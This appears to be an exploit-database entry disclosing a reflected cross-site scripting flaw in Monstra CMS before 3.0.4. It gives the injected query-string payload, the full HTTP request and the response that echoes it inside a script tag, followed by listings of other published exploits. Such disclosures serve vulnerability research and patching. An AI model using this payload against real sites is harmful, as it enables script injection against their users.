Menu

Search for hundreds of thousands of exploits

"Monstra CMS < 3.0.4 - Cross-Site Scripting (2)"

Author

Exploit author

"Berk Dusunur"

Platform

Exploit platform

php

Release date

Exploit published date

2018-05-18

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# Exploit Title: Monstra CMS 3.0.4 - Cross-Site Scripting
# Date: 2018-05-17
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://monstra.org
# Software Link: https://monstra.org
# Version: before 3.0.4
# Tested on: Pardus / Win10 AppServer

# Proof Of Concept
# Monstra is a modern and lightweight Content Management System.
# Prints get request between script tags on page


Payload ?vrk2f'-alert(1)-'ax8vv=1

GET Request

GET /test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 HTTP/1.1
Host: 192.168.1.106
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Response


<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new
Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js
','_mga');

_mga('create', '', 'auto');
_mga('send', 'pageview', {
'page': 'http://192.168.1.106/test/monstra-3.0.4/?vrk2f%27-alert(1',
'title': ''
});
</script></body>


http://localhost/test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-28 "Online-Exam-System 2015 - 'fid' SQL Injection" webapps php "Berk Dusunur"
2020-05-28 "NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection" webapps multiple "Berk Dusunur"
2020-01-29 "Liferay CE Portal 6.0.2 - Remote Command Execution" webapps java "Berk Dusunur"
2018-10-29 "Grapixel New Media 2 - 'pageref' SQL Injection" webapps php "Berk Dusunur"
2018-08-23 "PCViewer vt1000 - Directory Traversal" webapps windows "Berk Dusunur"
2018-07-23 "Synology DiskStation Manager 4.1 - Directory Traversal" webapps linux "Berk Dusunur"
2018-07-23 "NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution" webapps hardware "Berk Dusunur"
2018-07-22 "GeoVision GV-SNVR0811 - Directory Traversal" webapps hardware "Berk Dusunur"
2018-07-16 "WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting" webapps php "Berk Dusunur"
2018-07-10 "WolfSight CMS 3.2 - SQL Injection" webapps php "Berk Dusunur"
2018-06-28 "hycus CMS 1.0.4 - Authentication Bypass" webapps php "Berk Dusunur"
2018-06-22 "phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)" webapps php "Berk Dusunur"
2018-06-20 "NewMark CMS 2.1 - 'sec_id' SQL Injection" webapps linux "Berk Dusunur"
2018-06-18 "Redatam Web Server < 7 - Directory Traversal" webapps windows "Berk Dusunur"
2018-05-21 "Zenar Content Management System - Cross-Site Scripting" webapps php "Berk Dusunur"
2018-05-18 "Monstra CMS < 3.0.4 - Cross-Site Scripting (2)" webapps php "Berk Dusunur"
2018-03-26 "Acrolinx Server < 5.2.5 - Directory Traversal" remote windows "Berk Dusunur"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.